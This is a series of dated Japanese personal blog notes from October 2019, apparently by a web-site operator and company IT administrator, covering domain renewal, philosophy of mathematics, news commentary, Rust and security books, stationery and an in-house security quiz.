2019-10-29この messages で書いてる内容って、読んでる人の多くは MD で読んでるだろうから、いちいち「MarkupDancing で公開した」とか書いてることに違和感を持つかもしれない。そして、僕自身も投稿してる UI が MarkupDancing のページ・デザインを流用してるから MD のコンテンツみたいに扱ってしまうことがあるのだけれど、同じデータを PHILSCI.INFO と csh/tcsh のサイトでも共有しているのだ。なので、他のサイトでも表示しているという体裁で書いていることにご注意いただきたい。

2019-10-29ドメインの更新は、ようやく会社のクレジット・カードを登録して決済する手順に変更した。基本は自動更新にしてあるため、更新の期限が近づいたら稟議を通す手続きだけとなり、支払いの依頼をする必要はなくなる。その代わりに、決済が完了した通知を会計に提出するという手順となる。あとは、カードの有効期限だが、これは2026年まで有効のようだから(カード情報の登録は財務担当に代行して入力してもらったので、有効期限は後からでも管理画面にアクセスすれば分かるが、カード番号とかセキュリティ・コードは管理画面では分からないようになっている)、暫くは心配ないだろう。

2019-10-29こういうのを読んでも感じるけれど、テグマークの数学的宇宙仮説あるいは "shut up and calculate" というのは、数学的対象が実在するとしても《何の問題もない》という、自己目的化した演算の正当化ではないのかという気がする。でも、それって同語反復というか論点先取ではないか。「1は実在する、だってここに僕が『一人』いるんだもの」と言ってるのに等しい。それは、「数学的な宇宙は実在する、だってほら、ここに計算で説明できる宇宙があるじゃん」と言うのと同じだからである。https://www.nytimes.com/2019/09/07/opinion/sunday/quantum-physics.html

2019-10-29「ステマの疑い」っていうけど、ふつう定義に照らせばこれはステマだろう。広告であることを明示してない広告なんだから。したがって、ステマが良くないというなら良くないのだろう。でも、値段が高いという批判はおかしい。1回のツイートが50万円というのは、まぁ効果との兼ね合いなのでありうる金額だとは思う。だって、ツイートした後はずっと残って検索に引っかかるわけだし、そのときの発言だけではない影響があるからね。原則として、ツイートを削除しない限りは検索にヒットし続けるわけなのだから、仮に一か月後に削除するとしても有効期間を考えたら逆に安いかもしれない。実際、「大好きな京都の町並み!!京都を愛する人なら誰でも、京都市を応援できるんやって!詳しくはここから!」というフレーズで検索すると、「ミキ 昴生 兄」という芸人のツイートはいまだに検索にヒットするから、1年も掲載したままだ。検索にどれくらいヒットしたかはともかく、少なくとも1年間の広告費としては特に問題のある費用の投じ方ではないと思うね。京都市が、市の施策を吉本興業に所属する地元出身の漫才コンビにツイッターでPRしてもらうため、ツイート(つぶやき)1回につき、50万円を支払う契約を2018年度に同社と結んでいたことが京都新聞社の取材で27日までに分かった。ツイートには市が広告主と明確に分かる記載はなかった。市はタレントの発信力に期待したといい、金額や広報の手法について「問題があるとは考えていない」としている。漫才コンビのツイート1回に50万円 京都市が吉本とPR契約 識者「驚く額、誤解与える手法」|主要|地域のニュース|京都新聞

2019-10-29"JavaScript" という名称を換えたらどうかというブログ記事が話題になっていたので、久しぶりに MarkupDancing の記事を更新した。JavaScript の生い立ちを探る - MarkupDancing

2019-10-29階段を急いで降りるような事態に陥らないような生活をしたいものだが、それ以前に急いでいようといまいと、階段を降りる方が危険であるという話は聞くものだ。そして僕は、降りるときだけでなく昇るときにも、たまに足を踏み外しそうになる。これは老眼になったからではなく、子供の頃からなのだ。高校時代に幾つかの体育会系クラブから誘いを受けたほどの僕でも苦手だったのだから、運動神経や体力やセンスがあろうと階段を楽に昇降できるとは限らないのである。しかし、手すりを使うと全く問題なく昇り降りできるし、それどころか手すりに手を当てず、かざしているだけでも効果があるのは不思議だ。私は、幼い頃より階段を急いで降りるときは、足が下りについていけず、手すりがないと、降りられません。手すりなしで急いで階段を降りれる?【「ベーコン」さん(見附市:40代:女性)】 | ONES★

2019-10-29確かに、高校時代に論文の書き方といった本を何冊か読んでいるとき、本多勝一氏の『日本語の作文技術』だったかで、人名に使っている中黒の代わりに「=」を使い、「イマニュエル・カント」を「イマニュエル=カント」とするという表記が提案されていた。しかし、そもそもそれは enumeration に使う中黒との混同を避けるという dependency があって、自立した議論ではない。現状では「イマニュエル・カント・ルネ・デカルト」といったような不具合が起きるため、姓と名を分ける中黒と、列挙で使う中黒とを区別するためのものなのであった。しかし、僕は逆に分かち書きの区切りとしての中黒を止めることにしたので(今でも使ってしまっていることはあるが)、「イマニュエル・カント、ルネ・デカルト」と読点でよいではないかと思う。更には「イマニュエル・カント, ルネ・デカルト」として読点と混同しないようにしたいところだし、そうしている文書もあるが、カンマだと全角のカンマがあって、僕はあれは日本語の記号として認めていない(カンマは欧米語の表記記号なので、半角でしか使わないようにしている)から、カンマならなんでもいいと多くの人々に全角のカンマを使う習慣ができると僕自身の嗜好に反するため、これはまったくの趣味的な理由だが、分かち書きにカンマはなるべく使わないようにしている。ジュール・バルベー=ドールヴィイ(Jules Barbey d'aurevilliy)の名前のように、従来表記だとシュール・バルベー・ドールヴィイにしてある場合もありますが、この場合、バルベー・ドールヴィイが姓に当たるようなので、「=」の文字で繋げてあります。http://ameqlist.com/0/setu.htm

2019-10-28Hm, just my two cents, but I would have to ask why does our personnel staff give a lot of SIGHs at office. If that is merely a habit, we may force not to do so especially as a staff of human affairs.

2019-10-28目薬って、開封してから使い始めると1か月で使い切るように設計されているとかいう理由で、使用期限が1ヵ月だと書いている医療関係者がいるわけだけど、3ヶ月という意見もあって、要するに防腐剤のあるなしという条件をつけて正確な話をしてくれと言いたいんだよね。それに、僕は会社で日に二回ていどは点眼しているけれど、市販の目薬の分量なんて3ヶ月でも使い切るようには見えない。そんなに大量の目薬を使い切る人たちって、もう市販薬を何か月も使うんじゃなくて、眼科医院で診察・治療した方がいいんじゃないか。しょうがないので、もう会社に置いてある市販薬は3ヶ月ほど経つから、給料日が過ぎたら買い替える予定だ。おおよそ容器の15%くらいしか減ってないけどなぁ。自宅で使ってる『マイティアCL』も一ヶ月は経過した。ちなみに、『マイティアCL』は主にコンタクトレンズを使う人の目薬として知られているが、別にコンタクトの利用者でなくても使っていい。

2019-10-28来期に向けての予定として、そろそろ財務・経理・人事の業務データをバックアップする目的を除いて、ファイルサーバは Dropbox に移行したい。正直なところ奉行シリーズもクラウドへ移行した方がいいというのが役員との結論なので、これらも可能であれば数年以内に移行する方が良いだろう。

2019-10-28まぁ、ヨーロッパ人の方がたくさんノベール賞を受けてきたという他の要因を排除しない partitioning なんて統計的には無意味だね。https://twitter.com/erikbryn/status/1183111457380003840

2019-10-28この messages でも分かると思うのだが、僕はテレビ番組や絵画などを観察したり視聴するときは「観る」という表記を使うようにしている。「見る」は、視界に収めるというていどの意味しかないからだ。もちろん、「観る」ことで何かを正しく理解するという保証はないし、そこに映っているものへは関心がないまま漫然と画面を眺めているような状況では「モニターを見る」と表記することもある。

2019-10-28ここ最近、この手のスパムが増えてきた。SAKURA のサーバは昔からスパムに弱い SMTP サーバを運用しているので、自分から自分宛てへのスパムが簡単にやってくるわけだけど、まぁそんなに数は多くない。それにしても、こんなもん買うやつがいるんだろうか。ヒルズとかで遊んでる IT ベンチャーの経営者なりアイドルは、とっくに入手経路を確保してるだろう。ついに登場ニューヨークキャンディ / ただ舐めるだけなのに大興奮の / 魔法の飴 / 誰もが、性奴隷へと豹変 / アメリカ全土で人気大爆発 / 「アメセク」日本上陸#here

2019-10-28シンギュラリティ信者とは反対の極端が伝統的な宗教を前提にした、こういう活動だろう。「ケア」の一部も入るが、この段階の話になってくると本人にとっての問題(PHILSCI.INFO の論説で言う「FPV」)が最も重要なのだろうから、哲学や医学の観点だけで水を差すようなことを言ってどうなるのかは、軽々に扱うべきではない。もちろん、あの世があると信じ込まされて爆弾を抱えて突っ込む子供もいるわけだし、宗教に訴える死の扱いでモラル・ハザードは困るわけだが。The best place to start facing down your fear of death is to define what it is about death that scares you.Fear of Death - The Order of the Good Death

2019-10-28よく2ちゃんねるの「不老不死スレ」とかで素人がさんざん宣伝してるメトフォルミンとかの話をしてるようだ。確かに、こういう手順は二つ考えられる。一つは何らかのスイッチみたいな仕組みを変えることで《一気に》不老長寿になりうるし、もう一つは段階を追って《少しずつ》老化の要因を潰して不老長寿へ至るというものだ。しかしどちらにしても、現状の医学や薬理学やナノテクノロジーでは、仮に老化のステップに介入して150歳での生存を可能にしたとしても、そこへ行きつくまでに大半の人間が癌を始めとする細胞分裂時のエラーが原因で亡くなると思う。そういうことと長期の生存とは、逆に関連性が無くて一方が他方への抑制には使えないだろう。David Sinclair, Ph.D., A.O. is a Professor in the Department of Genetics and co-Director of the Paul F. Glenn Center for the Biology of Aging at Harvard Medical School. His new book "Lifespan: Why We Age And Why We Don't Have To" is now available.Joe Rogan Experience #1349 - David Sinclair

2019-10-28ブライアン・カーニハンが Amazon (Kindle Direct Publishing) で自費出版したタイトルのようだ。日本語では書籍として翻訳してもらいたいなぁ。Unix: A History and a Memoir. Since its creation in a Bell Labs attic in 1969, the Unix operating system has spread far beyond anything its creators could have imagined. It has led to the development of a great deal of innovative software, influenced myriad programmers, and changed the path of computer technology. This book is part history and part memoir. It tells the story of the origin of Unix, explaining what Unix is, how it came about, and why it matters. Accessible to non-speciaists, the book is written for anyone with an interest in computing or the history of inventions. Published by Kindle Direct Publishing, October 2019. Available at Amazon.https://www.cs.princeton.edu/~bwk/

2019-10-28コンプライアンスとか内部統制とかやってても、こんな具合で事件は起きる。この手の事案も、昔ながらのペリメータ・モデルしか頭にない「セキュリティ」担当者の雑な制度設計に問題があるのだろう。監査・監視の部門と該当部門とで協力してビジネス・プロセスを構築しない限りは、どこかが作ったものを別の部門のトップが「いいね」で判子をついて終わりになってしまう。大手ハンバーガーチェーン「日本マクドナルド」の財務担当の社員が3000万円を着服したとして逮捕されました。警視庁はあわせておよそ7億円を着服していた疑いがあるとみて調べています。マクドナルド社員が7億円着服か|NHK 首都圏のニュース

2019-10-28一般人になった瞬間に訴えられる、か。あと、この手の連中については報道すること自体が宣伝になるので、黙殺するべきだと思うね。こんなもんを黙殺しても民主主義とは何の関係もない。ちなみに、NHK しかじか党へ理解を示して NHK は観たくないと言ってる政治家がいるらしいけど、報道機関を与党の政治家が嫌っているというのは良いことではないのか。NHKは28日、受信料の支払いを求めて、NHKから国民を守る党党首の立花孝志氏を東京地裁に提訴した。立花氏は「NHKと契約はするが、受信料は踏み倒す」などと主張していた。NHK、N国党首を提訴=受信料支払い求め:時事ドットコム

2019-10-28Amazon.co.jp の書籍情報へリンクするときに、もちろんたいていは自分の ID が付いた URL を掲載するのは野暮な話なので、"https://www.amazon.co.jp/dp/427422435X/" のように全く余計なトレース情報のない URL とするようにしている(Cookie でトレースされている情報については、まぁ分かった上でアマゾンにアクセスしてる時点で僕のせいじゃないし)。多くのブログ記事などでは /dp/ の前に日本語で書籍名などが追加された URL を使っているが、そのまま使うと urlencode() されて酷く長い文字列となって醜悪だ。実際には、上記のように /dp/ の後に ISBN-10 の書籍番号を付けるだけで書籍にリンクできる。

2019-10-28自動生成の地図はこんなに色々なものがあるのか。少しやってみたが、僕の業務マシンのスペックですらブラウザがクラッシュしたものもあるため、それなりにパワーを使うのだろう。https://news.ycombinator.com/item?id=21362382

2019-10-28論点が混乱してるわけだけど、わざとなのかな。発達障害も含めて何らかの精神状態にある人々をどうやってサポートするかという話と、この手の事実上の犯罪者(たぶん捕まるのは時間の問題だと思う)を免罪したり擁護する話は、安易に絡めても得るものはないと思う。世の中が複雑だというしょーもない事実を言い立てて、医療や僕らそれぞれの常識的な判断なり対応、それから法律や行政まで含めて、何らかの限界があるということを吉本芸人の言い訳にされては困る。発達障害は適正に理解して対応するべきものだが、違法行為の酌量事由にすれば多くの殺人者が当時の精神状態を発達障害だったと主張して免責されてしまうだろう。人を殺すなんて「おかしい」からだ(おかしい人は僕も含めてたくさんいるが、それは殺人の理由にも言い訳にもならない)。法律だろうと僕らが他人を判断する仕方だろうと、差別や愚かな断定は避けるべきであるにせよ、一定の基準を作って何らかの判断をするという知恵を否定してどうなるのか。日本の軟弱社会学者や三流ルポライターがやるような、際限なく個人の些末な事実を言い立てては価値観を細分化したり相対化してゆき、人生いろいろなどと open question をぶちまけたら公平さが社会に実現するなどというファンタジーは、実は錯覚なのである。それをやって公平な判断ができるのは、実は理論的には「神」のような全知全能だけであって、現実の個々の人間にそういう細分化された《データ》がぶちまけられることで起きるのは、要するにトランプ政権や安倍政権やアマゾンやソフトバンクによって《支配してほしい民主主義者たち》なのだ。それが「病気」なのかどうか僕は専門家ではないので判断しかねるのだけれども、「仕事のための外出はできないけれど、自分が好きなこと、やりたいことなら、自由に外に出て楽しめる」というのは、本人にとっては「すごく苦しい」のかもしれないけれど、他者の理解を求めるのは難しいよね。徳井義実さんの「想像を絶するだらしなさ、ルーズさ」が、他人事とは思えない。 - いつか電池がきれるまで

2019-10-28人がやるサービスをただのデータ操作としか思ってない連中のやることなのだし、自業自得だろう。結局、エンドユーザにもビジネスモデルの部品として、よくできたロボット並みに行動してもらわなければ儲からないということだと、その程度のエラーを折り込んで設計するのがまともなプロダクト・マネージャというものだ。エンドユーザに、自分たちのモデルにとって《正しい》振る舞いとかモラルを要求するなんて、事業者としては最低だ。事例として挙げられているのは、複数のアプリで同時に配車を申し込んで最初に来たタクシーに乗ったり、予約しているにもかかわらず近くにいた別のタクシーに乗って他をキャンセルする、といったもの。タクシー配車アプリの「無断キャンセル」が問題に | スラド

2019-10-28こういう場合は、「Google が10,000日かかると言っていたのは、既存のコンピュータでも約2.5日で解けるていどのしょーもない問題だと主張しているようだ」と書いた方が、誤解は少ないのだろう。下記のような文だと、「約2.5日で解ける難しい問題ではない」と言っているように見えるが、そら10,000年かかるんだからそうだろうとしか思えないし、いや約2.5日じゃなくて数分だと言ってるのに、なにこの「約2.5日」ってという感想が生じる。もちろん、一つずつ整理すれば「そうじゃない筈だ」式に消去法で正しい主旨に到達するのだが、「難しい」とか「ではない」という表現のかかり方が不明確となっているせいで、いちいち推論しないと意味が分からないという表現は面倒臭い。通俗本や教科書などで「分かりやすい」書き方をしたいというのであれば、こういう点に注意すればいいのであって、専門用語や概念を雑な言葉に置き換えるみたいなことは関係がないのだ。IBMはGoogleの論文で取り上げられていた問題について、約2.5日で解ける難しい問題ではないと主張しているようだ。Google、草稿の漏洩で物議を醸した「量子超越性を実証」する論文を公開 | スラド IT

2019-10-28その「更新」もネットワーク経由なんだろ。僕はどうも、このネットワーク更新というのが信用し難いんだよね。特にリストアする手立てすら更新で動かなくなってしまうというのでは困るわけで、そんなもんは基盤つまりは BIOS に持っておいてもらいたい(BIOS の更新が失敗すると手がなくなるのは、既存のパソコンやスマートフォンでも同じくらいのリスクだ)。Googleがメディアに提供した声明によれば、このような問題を防ぐための更新を近くロールアウトする予定であり、影響を受けたデバイスは交換すると説明されている。Google、ファームウェア更新で文鎮化したGoogle Homeデバイスを交換対応 | スラド IT

2019-10-28広告用のコンテンツ・サーバ(配信サーバではなく、1週間に一度くらいの頻度でアド・ネットワークのサーバと同期するだけのもの)は、11月の下旬に構築することとなった。バナーを置くだけのことなので、ストレージも CPU もメモリもスペックは最低限で SAKURA のクラウドのインスタンスを立てるのだが、もちろんアド・ネットワークとの同期が取れないとか、画像ファイルが改竄されたりしてはいけないので、キャンペーン・サイトの事案と全く同じセキュリティ・レベルでサーバを構築する。

2019-10-28ここ数か月、「コンピュータの簡単操作センター」で、マウス・ポインタをロール・オーバーしたウィンドウをアクティブにする機能を使っていたのだが、結論としてはマウス・ポインタを作業中のウィンドウの上に置き続けなくてはいけないという余計な神経を使い続けるのがストレスになるようなので、この機能は無効に戻した。あと、これの設定画面は上にマウス・ポインタのビジュアル設定があるのだけれど、既存のマウスの設定を引き継がないため、ここで他の設定をなんでもいいから変更すると、マウス・ポインタが既定のものへ戻ってしまうんだよな。なので、この画面へは二度とアクセスしたくない。もどもと、Windows 10 では Dyna ファイラでファイルを実行したときに出るウィンドウを閉じても Dyna ファイラにフォーカスが戻らないという問題があったので有効にしたのだが、ロール・オーバーによるフォーカス移動は、それのストレスを遥かに超えるストレスがあった。そもそもマウス・ポインタって、ウィンドウで作業してるときは邪魔じゃん。ウィンドウに置き続けなくてはいけないなんて、そんな面倒臭いことを続けるのは耐え難い。

2019-10-28さて本日から、情報セキュリティの小テストを開始している。今回は、さきほど Twitter で見かけた「#どうでもいい個人情報を言う見た人もやる」というハッシュタグのツイートを取り上げた設問が二つ。DNS について、個人情報を取得する際に利用目的を明示して同意を得る理由、それから情報セキュリティの組織的な対策はどれかという設問を出している。昨年までの設問から同じ問題を何年かぶりに出題することもあるのだが、2年前の10月は5問ともランサムウェアについて出題していたので、今回はオリジナルの設問を作った。この小テストは今年で5年目となるのだが、ようやく受講率が安定して殆どの従業員が受講するようになった。当社は、営業の受講率が低いのは宇宙の真理と言っていいほどだから珍しくもないが、一般的な印象とは違ってデザイナーさんの受講率は常に高い。

2019-10-26海外で先行して発売されていた uni ball の Signo 207 は、現在は国内で手に入れようとすれば、アマゾンの並行輸入品などを注文するしかないらしい。Signo 307 のファン・ページを作成するにあたって、207 も使っておきたいので、手に入れておこうと思う。なお、207 はインクがゲル・インクなので、ナノ・ファイバーを使った 307 のインクとは材質としても違う。それから並行輸入だからだとは思うが、207 は 307 と比べて、日本で手に入れようとすると1本が300円くらいになる(もちろん、2本で3,000円などという値段で売っている詐欺師もたくさんいるので、並行輸入品の値段は商品名や型番で同じ商品を比較することが大切だ)。https://uniballco.com/technologies/#super-ink

2019-10-26僕も権藤さんと同じ意見だ。ソフトバンクの短期決戦での強さは目を見張るものがあるけれど、しょせんは年間スケジュールでは負けた球団であって、本来なら日本シリーズという舞台に立つべきではない。なんで数週間の敗者復活試合だけで年間の結果を全て引っくり返せるのか。逆に言えば、CS に出られる確証があればペナントレースは3位でも構わないという怠け癖が強豪の球団にはできてしまうのではないか。https://www.nikkan-gendai.com/articles/view/sports/263747/2

2019-10-26なんか楽観的なことを書いてるけど、「シェール革命」なんて全く話題にならなくなってて、アメリカでもカナダでもシェールオイルは事業継続性がないとして続々と事業者が廃業してるし、投資も集まらなくなってるというから、こういうドキュメントって事実を伝えたり解明するというよりも、何か別の目的があって既成事実化する思惑から公表されている(こういう文書を公表するという既成事実すら目的に入っている)と見たほうがいいのだろう。検索したり毎日のようにアクセスしていない限りは誰も気づかないような URL で文書を公表しておいて、「国民からは何も指摘を受けなかった」などとして木で鼻を括ったような弁解を並べるというのが、おそらくは奈良時代から続いてきた(宮台真司氏のような人々は、特に明治維新から高度成長期くらいまでは政府の官僚は、たぶん東大を出てるから有能だったと錯覚しているようだが)官僚の下らないアリバイ工作というものだ。そういうわけで、シェールガスにしても同様に怪しい。https://www.enecho.meti.go.jp/about/whitepaper/2015html/1-1-1.html

2019-10-26教育大学に附属する小学校から高等学校まで在学していた者として、数多くの教育者を見てきたり、あるいは「教育学」とか「教育評論」と称するものを口にする人々の意見と実績を眺めてきた者として言わせていただくと、この記事を書いている人物のような教育に関するプロパーというものも、同じ程度に怪しいと言わざるを得ない。僕ら哲学者から言えば、はっきり言って教育学というのは100年くらい前の段階の心理学と同じで、特定分野に関する出来損ないの哲学か素人の哲学だと言っていい。よく確立された体系も知的業績もなければ、はっきり言うと成果も乏しい。いくら開成や灘や東大寺の教員が生徒を東大に何千人と送り出していようと、それは学校「教育」の成果なのか、あるいは生徒が自主的に Z 会や東進も利用しているからなのか、そんなことは誰も論証したり実証した試しはないのだ。よって、確かに子供を東大に《入れた》と豪語するロクでもない母親(さて、これからそうして東大に入った連中の追跡調査を誰かが始めるのだろう)のくだらないエッセイをこぞって買うような人々には、少し自分の頭でものを考えたらどうかと言いたいところだが、しかしそう評している、いったい何の業績があるのかもわからない教育学者の提案にしたところで眉に唾をつけながら読んだほうがいいと言いたい。確かに、日本では教育を受けたことがない人はほぼいませんから、教育について一家言あるという人は少なくありません。そして数多くの体験談やエピソードがあふれる中、多くの人は、「子どもを全員東大に入れた」などの、極めて特殊な成功体験に魅了されてしまっています。「子どもは褒めて育てる」を実践する人の誤解 | 子育て

2019-10-26文房具について参考になる本というのも非常に少ない。なかば広告を買わされているかのごとき商品見本のようなムック本はたくさん発行されているが(実際、広告のようなものなので、メーカーからの写真原版や販促資料を調達しやすいのだろう)、知的啓発を受けるレベルの資料としての価値は殆どない。なので、下記のような著作もメーカーとのタイアップはあろうが、それでも一つの商品について掘り下げてあるだけ参考になることは多い。筆記具の要点は、何といってもインクである。ボディの扱い難さは何とかなるが(手帳に付属している鼻くそみたいに小さな鉛筆を、いくら日本人が小さいからと言っても扱いやすいと思って使った人などいまい)、質の悪いインクはどうしようもないので、インクを材料化学や使い勝手として詳しく書いてくれる本は貴重だ。滝田誠一郎, 『「消せるボールペン」30年の開発物語』https://www.amazon.co.jp/dp/4098252406/

2019-10-26店頭でも見かけることがあるけれど、ボールペンの練習帳とか字が上手くなる本というのは、なんであんなに色々な人が書いているのか。しかも、中身は実は殆ど同じである。確かに、手本となる文字は書家によって異なるが、結局は手本を眺めたり薄く印刷された手本を上から辿るという扱い方は同じだし、手本として採用されている文字も殆ど同じであり、当然だが画数の少なくて運筆の基礎的な練習ができる文字が多い。要するに、表紙の装丁と著者を次から次へと単に替えるだけで売れ続けるという不思議な商品だと言ってよいのだろう。ただ、定番商品と言うべきロング・セラーがないかと言えば、二玄社の硬筆字典やペン字字典は昔からあって、僕が中学生頃に買ったものは今でも発売されている。そして、最近の続々と発売されているボールペン字の練習帳が、そういう昔からの定番よりも解説として分かりやすくなっていたり懇切丁寧になっていたり、あるいは見本としても優れた文字なのかと言えば、実は全くそんなことはない。寧ろ、昔からある石川芳雲氏の手による字典と比べて見本の名に値しない、段位も免許もない僕よりも下手かと思うような字が多い。

2019-10-26へぇー。現代によみがえる保育園版の戸塚ヨットスクールといったところか。ガキに「さん」づけの NHK も気色悪いけど(もちろん、子供に人権はある。こんなことを言ってるくらいで子供の人権を軽視していると思われては心外だ)、逆にこういう保育園もえげつないな。園は厳しい教育指導で、園児たちが逆立ち歩きや統率の取れた集団体操などができるようになることで地元に知られていた。一方で子どもを中途退園させた複数の保護者が取材に日常的に体罰や過度のしつけがあったと証言。ある母親は子どもから「吐いたものを食べさせられた」と聞いたと語った。しつけ、体罰の苦情…市に相談40件 副園長が6歳児殴る 福岡・宗像 - 毎日新聞

2019-10-26既に解決済みの事案で、情報セキュリティのプロパーは誰も気にしていない話である。しかし、英語の脈絡を理解できない素養で機械翻訳に頼ったコタツ記事を書いてるような、東アジアの辺境地帯でジャーナリストとかライターを名乗ってる人々がデタラメをまき散らすといけないので、正確な脈絡を説明したい。つまり、この人物は The New York Times という《組織の》情報セキュリティ責任者でもなんでもない。Hacker News のコメントにあるとおり、NYT の CISO は Erinmichelle Perri という人で、今年の8月に採用された別人である。まるで NYT が情報セキュリティなりジャーナリストの情報保護に関する施策を止めたかのように書いているが、彼女は一人の director にすぎない。Runa Sandvik @runasand / Today the @nytimes chose to eliminate my role, stating that there is no need for a dedicated focus on newsroom and journalistic security. I strongly believe in what I do (and what we did), and to say I’m disappointed would be an understatement. (1/3)https://news.ycombinator.com/item?id=21329453

2019-10-26Sorry—an essay at MIT (especially written by people in Media Lab) is actually lameass about anything. もうこんな、山形浩生さんみたいに軽薄なトレンドに冷水をぶっかける人が翻訳したくなるような切り口の記事を MIT の名前で掲載しても、気の毒にぜんぜん権威どころか説得力がないよね。さて、次はどこの変態野郎から金をもらって研究した結果なんですか、という。Sorry—organic farming is actually worse for climate change

2019-10-25Rust の本を幾つか PDF などで眺めていたのだが、どの本もデータ型の説明が大半を占めていて、制御構造の説明は少ない。あと Rust ならマクロやモジュールの説明が欲しいところなのだが、これを十分に取り入れている著作は一つもなかった。よって、The Rust Standard Library のマニュアル(https://doc.rust-lang.org/std/)を使うしかない。こうした情報もふんだんに採り入れた、言わばラクダ本のような著作は、まだまだ先なのだろう。というか、そんな大部の本はもうオライリーや Wrox や Apress や No Starch ですら出ないのかもしれないが。

2019-10-26僕が nao さんと「セキュリティの本とかを出すのは、まだ難しいね」と話していた頃から10年以上が経って、ようやく WordPress のセキュリティをテーマにした本が出るようになったのは感慨深い(総論だけなら、いわゆる「徳丸本」を嚆矢としてもよいだろうか)。でも、それだけだ。著者は情報セキュリティどころかシステム開発の実務家ですらなく、紹介されている対策も、僕が MarkupDancing で掲載している内容の半分以下、しかもググレカスで見つかるような、素人が書けるコタツ記事ていどの内容をスクリーンショットで手順を紹介しながら解説するという、検索のスキルすらない全くの素人向けである。もちろん、素人に対策させるという底上げで効果を期待することにも意味はあるが、恐らくそんな素人はいちいち本など買わない。マーケティングというのは金儲けだけの議論ではないから言うが、これは情報伝達のマーケティングとしてモデルの設計が間違っていると思う。専門家、たとえば徳丸氏やソフトバンクの辻氏が感心するようなレベルで書いて、彼らが言及するような内容にしてこそ、多くの会社でも新卒に読めとか勧める人が出てきて普及するのだ。いきなり素人がセキュリティの本など読むわけないだろう。吉田哲也, 『WordPressセキュリティ大全』https://www.amazon.co.jp/dp/4798058904/

2019-10-25さきほどジュンク堂で見かけた新刊だ。日本語話者によるオリジナルの著作、つまり翻訳ではない。メモリ管理の話など、コンピュータの動作原理について解説を加えていたり、プログラミングの基礎になる考え方も取り入れている。僕が読んでいる "Beginning Rust" (Carlo Milanesi) と比べて取り上げている話題は限られているが、入門書としては十分な分量の解説だと思う。あとは店頭で実際に眺めてみて、4,000円に迫る費用を投じる価値があるかどうかを判断すればよいだろう。ざっと眺めた限りで言うと、コンピュータ・サイエンスの学生ではなく、プログラミングの勉強を初めてから一つの言語は学び終わったという段階の人が Rust を習得したいと思っていて、しかも洋書が読めないというのであれば、選択肢に入れていいと思う。酒井和哉,『Rustプログラミング入門』https://www.amazon.co.jp/dp/427422435X/

2019-10-25Windows 10 でメモ帳が見つからないという事案(ちなみにログインしないと読めないページ)だ。最初はスタート・メニューだとか "run as" の手順とかを答えて終わっているのだが、暫くすると再び同じ質問が繰り返される・・・Hacker News に話題としてわざわざ投稿されていた事情も、恐らくは Windows 7 から 10 とかにいきなり換えると UI がかなり違うという事実に関連しているのだろう。実際、僕もいまだにコントロール・パネルと「Windows の設定」という画面が二つある理由がはっきりとは分からない(マイクロソフトの公式の説明を読んだことがない)。後者はシームレスにネットワークを使った設定変更などに対応するものなのだろうと思うが、もしそうなら、そういう趣旨であることが分かるような画面名称にするべきだ。Where is NOTEPAD in Windows 10?

2019-10-25サブタイトルの "someone" は出稿元というわけだが、もちろんこれは新聞業界の一般論ではない。日本の新聞社だと、広告収入よりも販売収入の方が圧倒的に多いからだ。The price paid for the printed copy was by no means sustaining the newspaper business.We never paid for Journalism

2019-10-25Signal の開発元が寄付を受け付けている。ジャーナリストにとっては必需とのことだが、僕には必要ない。理由は、このページで幾つか書いた。 https://www.markupdancing.net/archive/note.html?date=9059d669f1e0f5a3add0f721b57e1cfbSignal—which is free to download and use—relies on donations to keep it going. In their early years, they were unable to register as an official 501c3 nonprofit due to limited capacity.Signal Technology Foundation is now open for donations

2019-10-25モンティ・ホール問題と同じ「3囚人問題」というのがあって、ウィキペディアでは「かつて日本で精力的に研究された」と書かれているのだが、英語版を見ても参考文献として日本人による著作が出ていない。ということは、大勢で研究したところで国際的な評価を受けるような成果が出なかったということじゃないの、はっきり言って。なら、「日本で精力的に研究された」なんて単なる些末な事実は書かない方がいいね。恥としか思えない。だいたい、日本の認知心理学なんて、せいぜい錯覚や詭弁に「なんとかバイアス」とか名前をつけて通俗本を書くしか能がない連中がたくさんいるのは知ってるよ。https://en.wikipedia.org/wiki/Three_Prisoners_problem

2019-10-25こういう記事は興味深いのだけれど・・・まぁ一読すると大したことないのが残念だよな。それは「22」という数じゃなくて、21と23のあいだという位置関係の話にすぎないのだから、やっぱり「22」という数値としてのポート番号に何か不可避の事情とか必然性なんてないじゃないかという話になる。I designed SSH to replace both telnet (port 23) and ftp (port 21). Port 22 was free. It was conveniently between the ports for telnet and ftp.https://www.ssh.com/ssh/port

2019-10-25新井さん(女性の方)の事案でもあった、統語論的な扱いはできても《意味を理解しているかどうか》は分からないという問題はあろう。分析哲学ならゾンビの話になるのかもしれないが、科学哲学から見てそういう与太話に時間をかける必要はない(「論理的」な問題ですらないからだ)。ただ、力技にしてもスケールがデカいよなぁ。SuperGLUE Benchmark

2019-10-26科研費を一種のシビリアン・コントロールだと見做している人はいるんだよね。でも、それって SF まがいのキチガイ科学者が宇宙を崩壊させる実験を勝手にやるのを防ぐ(以前も小さいブラック・ホールを発生させる実験で科学者を脅迫した人が何人かいたらしい)という妄想とセットになってないか? 誰が考えても危険な実験なら、まず科学者の中でまともな人が気づくだろう。そして、誰も気づかないリスクのある実験を考案する天才がいたら、それはそれでチャンスに賭ける価値があるかもしれないし、それにそもそも誰からも気づかれずに隠れて勝手に実験するなんてことは、昔から誰でも可能だった筈だ。公的あるいは大学から資金を得て実験するから人々の知るところとなるわけであって、各国で軍や私企業がやってる実験がもっと危険である可能性はあろう。でも、そんなのがどこでどれだけ実施されていようと、僕らには分からない。よって、本気でシビリアン・コントロールを考えるなら、科研費なんてしょーもないスケールの研究だけに着目していてはいけないし、実際のところ科研費を申請してくるていどの研究に地球を崩壊させるようなリスクなんてあるわけない。

2019-10-25このページとかにしても、googlebot にテキスト情報をインデックスさえしてもらえばいいみたいな方針でページ・デザインしてるとしか思えないようなスタイル定義だよね、いまどき。で、本題に入ると、Elsevier のような有償の学術出版をボイコットするだけでは不十分("good start" だとは言ってるので、著者は別に反対しているわけではない)であり、たとえばオープンなプラットフォームを利用するとしても、今度はそのコストをどうするか、誰がメンテナンスするかという問題は起きるとしている。ローレンス・クラウスが『宇宙が始まる前には何があったのか?』で軽口を書いたように、無限に補充できる「大学院生」というリソースを使えば解決するのかもしれないが。Opinion: Boycotting Elsevier Is Not Enough

